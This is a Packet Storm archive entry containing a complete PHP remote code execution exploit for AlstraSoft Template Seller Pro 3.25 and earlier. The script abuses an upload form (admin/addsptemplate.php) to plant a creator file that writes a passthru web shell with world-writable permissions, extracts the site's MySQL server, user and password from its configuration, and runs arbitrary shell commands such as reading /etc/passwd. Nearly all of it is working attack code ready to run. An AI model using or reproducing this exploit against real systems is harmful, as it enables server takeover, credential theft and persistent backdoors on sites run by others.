tsp-exec.txt

2007-05-21T00:00:00
ID PACKETSTORM:56841
Type packetstorm
Reporter BlackHawk
Modified 2007-05-21T00:00:00

Description

                                        
                                            `#!/usr/bin/php -q -d short_open_tag=on  
<?  
echo "  
AlstraSoft Template Seller Pro <= 3.25 Remote Code Execution Exploit  
by BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>  
Thanks to rgod for the php code and Marty for the Love  
  
";  
if ($argc<4) {  
echo "Usage: php ".$argv[0]." Host Path CMD  
Host: target server (ip/hostname)  
Path: path of template  
CMD: A Shell Command  
  
Example:  
php ".$argv[0]." localhost /template/ cat /etc/passwd";  
  
die;  
}  
error_reporting(0);  
ini_set("max_execution_time",0);  
ini_set("default_socket_timeout",5);  
  
/*  
___________________________________________________________________  
/ This script is part of the AlstraSoft Exploit Pack: \  
| |  
| http://itablackhawk.altervista.org/exploit/alsoft_exploit_pack; |  
| |  
| You can find the patches for this bugs at: |  
| |  
| http://itablackhawk.altervista.org/download/alsoft_patch.zip |  
| |  
\________________________.:BlackHawk 2007:._________________________/  
  
*/  
  
/*  
VULN EXPLANATION  
  
Same problem of Vuln N.1 but with this we can upload PHP files..  
  
The Vulnerable script can be found in admin/addsptemplate.php  
  
  
*/  
  
function quick_dump($string)  
{  
$result='';$exa='';$cont=0;  
for ($i=0; $i<=strlen($string)-1; $i++)  
{  
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))  
{$result.=" .";}  
else  
{$result.=" ".$string[$i];}  
if (strlen(dechex(ord($string[$i])))==2)  
{$exa.=" ".dechex(ord($string[$i]));}  
else  
{$exa.=" 0".dechex(ord($string[$i]));}  
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}  
}  
return $exa."\r\n".$result;  
}  
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';  
function sendpacketii($packet)  
{  
global $proxy, $host, $port, $html, $proxy_regex;  
if ($proxy=='') {  
$ock=fsockopen(gethostbyname($host),$port);  
if (!$ock) {  
echo 'No response from '.$host.':'.$port; die;  
}  
}  
else {  
$c = preg_match($proxy_regex,$proxy);  
if (!$c) {  
echo 'Not a valid proxy...';die;  
}  
$parts=explode(':',$proxy);  
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";  
$ock=fsockopen($parts[0],$parts[1]);  
if (!$ock) {  
echo 'No response from proxy...';die;  
}  
}  
fputs($ock,$packet);  
if ($proxy=='') {  
$html='';  
while (!feof($ock)) {  
$html.=fgets($ock);  
}  
}  
else {  
$html='';  
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {  
$html.=fread($ock,1);  
}  
}  
fclose($ock);  
}  
  
$host=$argv[1];  
$path=$argv[2];  
  
$cmd="";  
for ($i=3; $i<=$argc-1; $i++){  
$cmd.=" ".$argv[$i];  
}  
$port=80;  
$proxy="";  
  
$cmd=urlencode($cmd);  
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}  
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}  
  
echo "- Uploading Shell Creator..\r\n";  
$italy_rulez=  
chr(0xff).chr(0xd8).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).  
chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).  
chr(0x00).chr(0x60).chr(0x00).chr(0x60).chr(0x00).chr(0x00).chr(0xff).  
chr(0xe1).chr(0x00).chr(0x36).chr(0x45).chr(0x78).chr(0x69).chr(0x66).  
chr(0x00).chr(0x00).chr(0x49).chr(0x49).chr(0x2a).chr(0x00).chr(0x08).  
chr(0x00).chr(0x00).chr(0x00).chr(0x02).chr(0x00).chr(0x01).chr(0x03).  
chr(0x05).chr(0x00).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x26).  
chr(0x00).chr(0x00).chr(0x00).chr(0x03).chr(0x03).chr(0x01).chr(0x00).  
chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x14).chr(0xc6).  
chr(0xff).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xa0).chr(0x86).  
chr(0x01).chr(0x00).chr(0x8f).chr(0xb1).chr(0x00).chr(0x00).chr(0xff).  
chr(0xdb).chr(0x00).chr(0x43).chr(0x00).chr(0x08).chr(0x06).chr(0x06).  
chr(0x07).chr(0x06).chr(0x05).chr(0x08).chr(0x07).chr(0x07).chr(0x07).  
chr(0x09).chr(0x09).chr(0x08).chr(0x0a).chr(0x0c).chr(0x14).chr(0x0d).  
chr(0x0c).chr(0x0b).chr(0x0b).chr(0x0c).chr(0x19).chr(0x12).chr(0x13).  
chr(0x0f).chr(0x14).chr(0x1d).chr(0x1a).chr(0x1f).chr(0x1e).chr(0x1d).  
chr(0x1a).chr(0x1c).chr(0x1c).chr(0x20).chr(0x24).chr(0x2e).chr(0x27).  
chr(0x20).chr(0x22).chr(0x2c).chr(0x23).chr(0x1c).chr(0x1c).chr(0x28).  
chr(0x37).chr(0x29).chr(0x2c).chr(0x30).chr(0x31).chr(0x34).chr(0x34).  
chr(0x34).chr(0x1f).chr(0x27).chr(0x39).chr(0x3d).chr(0x38).chr(0x32).  
chr(0x3c).chr(0x2e).chr(0x33).chr(0x34).chr(0x32).chr(0xff).chr(0xdb).  
chr(0x00).chr(0x43).chr(0x01).chr(0x09).chr(0x09).chr(0x09).chr(0x0c).  
chr(0x0b).chr(0x0c).chr(0x18).chr(0x0d).chr(0x0d).chr(0x18).chr(0x32).  
chr(0x21).chr(0x1c).chr(0x21).chr(0x32).chr(0x32).chr(0x32).chr(0x32).  
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).  
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).  
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).  
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).  
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).  
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).  
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0xff).chr(0xc0).chr(0x00).  
chr(0x11).chr(0x08).chr(0x00).chr(0x14).chr(0x00).chr(0x1e).chr(0x03).  
chr(0x01).chr(0x22).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).  
chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x1f).chr(0x00).  
chr(0x00).chr(0x01).chr(0x05).chr(0x01).chr(0x01).chr(0x01).chr(0x01).  
chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x02).chr(0x03).chr(0x04).  
chr(0x05).chr(0x06).chr(0x07).chr(0x08).chr(0x09).chr(0x0a).chr(0x0b).  
chr(0xff).chr(0xc4).chr(0x00).chr(0xb5).chr(0x10).chr(0x00).chr(0x02).  
chr(0x01).chr(0x03).chr(0x03).chr(0x02).chr(0x04).chr(0x03).chr(0x05).  
chr(0x05).chr(0x04).chr(0x04).chr(0x00).chr(0x00).chr(0x01).chr(0x7d).  
chr(0x01).chr(0x02).chr(0x03).chr(0x00).chr(0x04).chr(0x11).chr(0x05).  
chr(0x12).chr(0x21).chr(0x31).chr(0x41).chr(0x06).chr(0x13).chr(0x51).  
chr(0x61).chr(0x07).chr(0x22).chr(0x71).chr(0x14).chr(0x32).chr(0x81).  
chr(0x91).chr(0xa1).chr(0x08).chr(0x23).chr(0x42).chr(0xb1).chr(0xc1).  
chr(0x15).chr(0x52).chr(0xd1).chr(0xf0).chr(0x24).chr(0x33).chr(0x62).  
chr(0x72).chr(0x82).chr(0x09).chr(0x0a).chr(0x16).chr(0x17).chr(0x18).  
chr(0x19).chr(0x1a).chr(0x25).chr(0x26).chr(0x27).chr(0x28).chr(0x29).  
chr(0x2a).chr(0x34).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).  
chr(0x3a).chr(0x43).chr(0x44).chr(0x45).chr(0x46).chr(0x47).chr(0x48).  
chr(0x49).chr(0x4a).chr(0x53).chr(0x54).chr(0x55).chr(0x56).chr(0x57).  
chr(0x58).chr(0x59).chr(0x5a).chr(0x63).chr(0x64).chr(0x65).chr(0x66).  
chr(0x67).chr(0x68).chr(0x69).chr(0x6a).chr(0x73).chr(0x74).chr(0x75).  
chr(0x76).chr(0x77).chr(0x78).chr(0x79).chr(0x7a).chr(0x83).chr(0x84).  
chr(0x85).chr(0x86).chr(0x87).chr(0x88).chr(0x89).chr(0x8a).chr(0x92).  
chr(0x93).chr(0x94).chr(0x95).chr(0x96).chr(0x97).chr(0x98).chr(0x99).  
chr(0x9a).chr(0xa2).chr(0xa3).chr(0xa4).chr(0xa5).chr(0xa6).chr(0xa7).  
chr(0xa8).chr(0xa9).chr(0xaa).chr(0xb2).chr(0xb3).chr(0xb4).chr(0xb5).  
chr(0xb6).chr(0xb7).chr(0xb8).chr(0xb9).chr(0xba).chr(0xc2).chr(0xc3).  
chr(0xc4).chr(0xc5).chr(0xc6).chr(0xc7).chr(0xc8).chr(0xc9).chr(0xca).  
chr(0xd2).chr(0xd3).chr(0xd4).chr(0xd5).chr(0xd6).chr(0xd7).chr(0xd8).  
chr(0xd9).chr(0xda).chr(0xe1).chr(0xe2).chr(0xe3).chr(0xe4).chr(0xe5).  
chr(0xe6).chr(0xe7).chr(0xe8).chr(0xe9).chr(0xea).chr(0xf1).chr(0xf2).  
chr(0xf3).chr(0xf4).chr(0xf5).chr(0xf6).chr(0xf7).chr(0xf8).chr(0xf9).  
chr(0xfa).chr(0xff).chr(0xc4).chr(0x00).chr(0x1f).chr(0x01).chr(0x00).  
chr(0x03).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).  
chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x01).chr(0x02).chr(0x03).chr(0x04).chr(0x05).  
chr(0x06).chr(0x07).chr(0x08).chr(0x09).chr(0x0a).chr(0x0b).chr(0xff).  
chr(0xc4).chr(0x00).chr(0xb5).chr(0x11).chr(0x00).chr(0x02).chr(0x01).  
chr(0x02).chr(0x04).chr(0x04).chr(0x03).chr(0x04).chr(0x07).chr(0x05).  
chr(0x04).chr(0x04).chr(0x00).chr(0x01).chr(0x02).chr(0x77).chr(0x00).  
chr(0x01).chr(0x02).chr(0x03).chr(0x11).chr(0x04).chr(0x05).chr(0x21).  
chr(0x31).chr(0x06).chr(0x12).chr(0x41).chr(0x51).chr(0x07).chr(0x61).  
chr(0x71).chr(0x13).chr(0x22).chr(0x32).chr(0x81).chr(0x08).chr(0x14).  
chr(0x42).chr(0x91).chr(0xa1).chr(0xb1).chr(0xc1).chr(0x09).chr(0x23).  
chr(0x33).chr(0x52).chr(0xf0).chr(0x15).chr(0x62).chr(0x72).chr(0xd1).  
chr(0x0a).chr(0x16).chr(0x24).chr(0x34).chr(0xe1).chr(0x25).chr(0xf1).  
chr(0x17).chr(0x18).chr(0x19).chr(0x1a).chr(0x26).chr(0x27).chr(0x28).  
chr(0x29).chr(0x2a).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).  
chr(0x3a).chr(0x43).chr(0x44).chr(0x45).chr(0x46).chr(0x47).chr(0x48).  
chr(0x49).chr(0x4a).chr(0x53).chr(0x54).chr(0x55).chr(0x56).chr(0x57).  
chr(0x58).chr(0x59).chr(0x5a).chr(0x63).chr(0x64).chr(0x65).chr(0x66).  
chr(0x67).chr(0x68).chr(0x69).chr(0x6a).chr(0x73).chr(0x74).chr(0x75).  
chr(0x76).chr(0x77).chr(0x78).chr(0x79).chr(0x7a).chr(0x82).chr(0x83).  
chr(0x84).chr(0x85).chr(0x86).chr(0x87).chr(0x88).chr(0x89).chr(0x8a).  
chr(0x92).chr(0x93).chr(0x94).chr(0x95).chr(0x96).chr(0x97).chr(0x98).  
chr(0x99).chr(0x9a).chr(0xa2).chr(0xa3).chr(0xa4).chr(0xa5).chr(0xa6).  
chr(0xa7).chr(0xa8).chr(0xa9).chr(0xaa).chr(0xb2).chr(0xb3).chr(0xb4).  
chr(0xb5).chr(0xb6).chr(0xb7).chr(0xb8).chr(0xb9).chr(0xba).chr(0xc2).  
chr(0xc3).chr(0xc4).chr(0xc5).chr(0xc6).chr(0xc7).chr(0xc8).chr(0xc9).  
chr(0xca).chr(0xd2).chr(0xd3).chr(0xd4).chr(0xd5).chr(0xd6).chr(0xd7).  
chr(0xd8).chr(0xd9).chr(0xda).chr(0xe2).chr(0xe3).chr(0xe4).chr(0xe5).  
chr(0xe6).chr(0xe7).chr(0xe8).chr(0xe9).chr(0xea).chr(0xf2).chr(0xf3).  
chr(0xf4).chr(0xf5).chr(0xf6).chr(0xf7).chr(0xf8).chr(0xf9).chr(0xfa).  
chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).chr(0x01).chr(0x00).  
chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).chr(0x00).  
chr(0xd6).chr(0xaf).chr(0x4f).chr(0xf0).chr(0x97).chr(0xfc).chr(0x8b).  
chr(0x16).chr(0x7f).chr(0xf0).chr(0x3f).chr(0xfd).chr(0x0d).chr(0xab).  
chr(0xcc).chr(0x2b).chr(0xd3).chr(0xfc).chr(0x25).chr(0xff).chr(0x00).  
chr(0x22).chr(0xc5).chr(0x9f).chr(0xfc).chr(0x0f).chr(0xff).chr(0x00).  
chr(0x43).chr(0x6a).chr(0xf9).chr(0x0c).chr(0x83).chr(0xfd).chr(0xe6).  
chr(0x5f).chr(0xe1).chr(0x7f).chr(0x9a).chr(0x3e).chr(0x13).chr(0x85).  
chr(0xff).chr(0x00).chr(0xdf).chr(0x25).chr(0xfe).chr(0x17).chr(0xf9).  
chr(0xa3).chr(0x80).chr(0xf8).chr(0xd9).chr(0xff).chr(0x00).chr(0x30).  
chr(0x3f).chr(0xfb).chr(0x78).chr(0xff).chr(0x00).chr(0xda).chr(0x75).  
chr(0xe4).chr(0xb5).chr(0xeb).chr(0x5f).chr(0x1b).chr(0x3f).chr(0xe6).  
chr(0x07).chr(0xff).chr(0x00).chr(0x6f).chr(0x1f).chr(0xfb).chr(0x4e).  
chr(0xbc).chr(0x96).chr(0xbd).chr(0x2c).chr(0x67).chr(0xf1).chr(0xe5).  
chr(0xf2).chr(0xfc).chr(0x8f).chr(0xe9).chr(0x0e).chr(0x1b).chr(0xff).  
chr(0x00).chr(0x91).chr(0x5d).chr(0x2f).chr(0xfb).chr(0x7b).chr(0xff).  
chr(0x00).chr(0x4a).chr(0x67).chr(0xa5).chr(0x57).chr(0xa7).chr(0xf8).  
chr(0x4b).chr(0xfe).chr(0x45).chr(0x8b).chr(0x3f).chr(0xf8).chr(0x1f).  
chr(0xfe).chr(0x86).chr(0xd4).chr(0x51).chr(0x5e).chr(0x6e).chr(0x41).  
chr(0xfe).chr(0xf3).chr(0x2f).chr(0xf0).chr(0xbf).chr(0xcd).chr(0x1f).  
chr(0xcd).chr(0xfc).chr(0x2f).chr(0xfe).chr(0xf9).chr(0x2f).chr(0xf0).  
chr(0xbf).chr(0xcd).chr(0x1c).chr(0x07).chr(0xc6).chr(0xcf).chr(0xf9).  
chr(0x81).chr(0xff).chr(0x00).chr(0xdb).chr(0xc7).chr(0xfe).chr(0xd3).  
chr(0xaf).chr(0x25).chr(0xa2).chr(0x8a).chr(0xf4).chr(0xb1).chr(0x9f).  
chr(0xc7).chr(0x97).chr(0xcb).chr(0xf2).chr(0x3f).chr(0xa4).chr(0x38).  
chr(0x6f).chr(0xfe).chr(0x45).chr(0x74).chr(0xbf).chr(0xed).chr(0xef).  
chr(0xfd).chr(0x29).chr(0x9f).chr(0xff).chr(0xd9);  
$data="-----------------------------7d529a1d23092a\r\n";  
$data.="Content-Disposition: form-data; name=\"zip\"; filename=\"piggy_marty_creator.php\"\r\n";  
$data.="Content-Type:\r\n\r\n";  
$data.="<?php  
\$fp=fopen('piggy_marty.php','w');  
fputs(\$fp,'<?php error_reporting(0);  
set_time_limit(0);  
if (get_magic_quotes_gpc()) {  
\$_GET[cmd]=stripslashes(\$_GET[cmd]);  
}  
echo 666999;  
passthru(\$_GET[cmd]);  
echo 666999;  
?>');  
fclose(\$fp);  
chmod('piggy_marty.php',777);  
include '../../include/common.php';  
echo 'delimitator'.\$db_server.'|'.\$db_user.'|'.\$db_password.'|'.\$db_database;  
?>\r\n";  
$data.='-----------------------------7d529a1d23092a  
Content-Disposition: form-data; name="addsubmit"  
  
1  
-----------------------------7d529a1d23092a  
Content-Disposition: form-data; name="type"  
  
2  
-----------------------------7d529a1d23092a  
Content-Disposition: form-data; name="category"  
  
Exploit And Similar  
-----------------------------7d529a1d23092a  
Content-Disposition: form-data; name="sdes"  
  
4  
-----------------------------7d529a1d23092a  
Content-Disposition: form-data; name="fpi"; filename="daforno_imperat.jpeg";  
Content-Type: image/pjpeg  
  
'.$italy_rulez.'  
-----------------------------7d529a1d23092a--  
';  
$packet="POST ".$p."admin/addsptemplate.php HTTP/1.0\r\n";  
$packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof  
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";  
$packet.="Referer: http://".$host.$path."/example.html\r\n";  
$packet.="Accept-Language: it\r\n";  
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";  
$packet.="Accept-Encoding: gzip, deflate\r\n";  
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Content-Length: ".strlen($data)."\r\n";  
$packet.="Connection: Close\r\n";  
$packet.="Cache-Control: no-cache\r\n\r\n";  
$packet.=$data;  
sendpacketii($packet);  
  
echo "- Retrieving correct Path where the shell is located..\r\n";  
  
$packet ="GET ".$p."spusers/browse.php?browse=yes&show=all HTTP/1.0\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Connection: Close\r\n\r\n";  
$packet.=$data;  
sendpacketii($packet);  
if (preg_match("#/sptemplates/(.*?)/thumb_daforno_imperat.jpeg#is", $html, $oki))  
{  
echo "- Creating the Shell & getting server credentials..\r\n";  
$packet ="GET ".$p."sptemplates/".$oki[1]."/piggy_marty_creator.php HTTP/1.0\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Connection: Close\r\n\r\n";  
$packet.=$data;  
sendpacketii($packet);  
  
sleep(3);  
$temp=explode('delimitator',$html);  
list($myserver,$myusername,$mypassword,$mydbname)=explode('|',$temp[1]);  
echo "  
  
--- INFO FROM COMMON.PHP ---  
  
MySQL Server: $myserver  
MySQL Username: $myusername  
MySQL Password: $mypassword  
MySQL Database: $mydbname  
  
--- END INFO ---  
  
";  
echo "Step 5 - Execute Commands exist..\r\n";  
$packet ="GET ".$p."sptemplates/".$oki[1]."/piggy_marty.php?cmd=$cmd HTTP/1.0\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Connection: Close\r\n\r\n";  
$packet.=$data;  
sendpacketii($packet);  
if (strstr($html,"666999"))  
{  
echo "Exploit succeeded...\r\n";  
$temp=explode("666999",$html);  
die("\r\n".$temp[1]."\r\n");  
}  
  
}  
else  
{  
die ('Error: Can\'t retrieve Shell Path');  
}  
  
# Coded With BH Fast Generator v0.1  
?>  
  
`